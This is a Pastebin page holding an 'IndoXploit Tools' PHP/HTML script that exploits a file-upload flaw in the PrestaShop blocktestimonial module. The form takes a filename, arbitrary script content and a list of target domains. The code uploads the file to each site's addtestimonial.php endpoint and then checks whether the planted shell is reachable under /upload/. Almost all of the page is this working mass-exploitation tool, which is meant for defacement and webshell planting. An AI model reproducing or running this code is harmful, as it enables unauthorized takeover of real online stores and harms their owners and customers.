SHARE
TWEET

Prestashop Modules Blocktestimonial File Upload

AgusSR Dec 17th, 2016 (edited) 1,727 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2.     <head>
  3.     <title>Prestashop Blocktestimonial Modules File Upload</title>
  4.     <meta charset="UTF-8">
  5.     <meta name="author" content="IndoXploit - l0c4lh34rtz">
  6. <style type="text/css">
  7. html {
  8.     margin: 10px auto;
  9.     color: #000000;
  10. }
  11. header {
  12.     font-size: 40px;
  13.     text-align: center;
  14.     margin: 0px auto;
  15. }
  16. input[type=text] {
  17.     padding: 7px;
  18.     margin: 5px auto;
  19.     margin-left: 30px;
  20.     border: 0;
  21.     border-bottom: 1px solid #000000;
  22.     color: #bb0000;
  23.     width: 250px;
  24.     height: 25px;
  25.     outline: none;
  26. }
  27. .btn {
  28.   color: #ffffff;
  29.   width: 250px;
  30.   height: 25px;
  31.   background: #000000;
  32.   text-decoration: none;
  33. }
  34.  
  35. .btn:hover {
  36.   cursor: pointer;
  37.   text-decoration: none;
  38. }
  39. table {
  40.     margin-left: 30px;
  41. }
  42. textarea {
  43.     padding: 5px;
  44.     resize: none;
  45.     border: 1px solid #000000;
  46.     width: 550px;
  47.     height: 250px;
  48.     outline: none;
  49. }
  50. </style>
  51. </head>
  52. <header>IndoXploit Tools - PS Modules Blocktestimonial File Upload</header>
  53. <hr width="95%">
  54. <table width="100%" align="center">
  55. <form method="post" action="" enctype="multipart/form-data">
  56. <tr><td><pre>Filename   : <input type="text" name="filename" placeholder="idx.php" required></td></tr>
  57. <tr><td><pre>Script     : <br><textarea placeholder="Hacked by l0c4lh34rtz - IndoXploit" name="source" required></textarea></td>
  58. <td><pre>Target     : <br><textarea placeholder="www.target.com" name="target" required></textarea></td>
  59. </tr>
  60. <tr><td><input type="submit" class="btn" name="exploit" value="Xploit"></td></tr>
  61. </form>
  62. </table>
  63. <div style='margin: 5px auto; padding-left: 15px;'>
  64. <?php
  65. set_time_limit(0);
  66. error_reporting(0);
  67.  
  68. function curl($url,$post,$data,$headers,$header,$cookie) {
  69.     $ch = curl_init();
  70.           curl_setopt($ch, CURLOPT_URL, $url);
  71.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  72.           curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  73.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  74.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  75.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  76.           curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  77.     if($post) {
  78.           curl_setopt($ch, CURLOPT_POST, true);
  79.           curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  80.     }
  81.     if($cookie) {
  82.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  83.     } else {
  84.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  85.     }
  86.     if($headers) {
  87.           curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
  88.     }
  89.     $exec = curl_exec($ch);
  90.     $info = curl_getinfo($ch);
  91.     return array(
  92.         "http" => $info['http_code'],
  93.         "response" => $exec
  94.     );
  95.           curl_close($ch);
  96. }
  97.  
  98. $filename = htmlspecialchars($_POST['filename']);
  99. $script = $_POST['source'];
  100. $domains = explode("\r\n", htmlspecialchars($_POST['target']));
  101. $go = $_POST['exploit'];
  102.  
  103. if(isset($go)) {
  104.     $handle = fopen($filename, "w");
  105.     fwrite($handle, $script);
  106.     fclose($handle);
  107.  
  108.     foreach($domains as $target) {
  109.         if(!preg_match("/^http:\/\//", $target) AND !preg_match("/^https:\/\//", $target)) {
  110.             $target = "http://$target/";
  111.         }
  112.         echo "[+] URL: $target<br>";
  113.         $post = array(
  114.             "testimonial_submitter_name" => "indoxploit",
  115.             "testimonial_title" => "hacked by indoxploit",
  116.             "testimonial_main_message" => "hacked by indoxploit",
  117.             "testimonial_img" => "@$filename",
  118.             "testimonial" => "Submit Testimonial",
  119.         );
  120.         $exploit = curl("$target/modules/blocktestimonial/addtestimonial.php", TRUE, $post, FALSE, NULL, TRUE);
  121.         $cek_shell = curl("$target/upload/$filename", FALSE, NULL, FALSE, NULL, FALSE);
  122.         if(preg_match("/Your testimonial was submitted successfully./", $exploit['response'])) {
  123.             echo "[+] Successfully !<br>";
  124.             if($cek_shell['http'] == 200) {
  125.                 echo "[+] $target/upload/$filename<br><br>";
  126.             } else {
  127.                 echo "[+] Shell not Found :(<br><br>";
  128.             }
  129.         } else {
  130.             echo "[+] Fail :(<br><br>";
  131.         }
  132.     }
  133. }
  134. ?>
  135. </div>
  136. </html>
RAW Paste Data
Top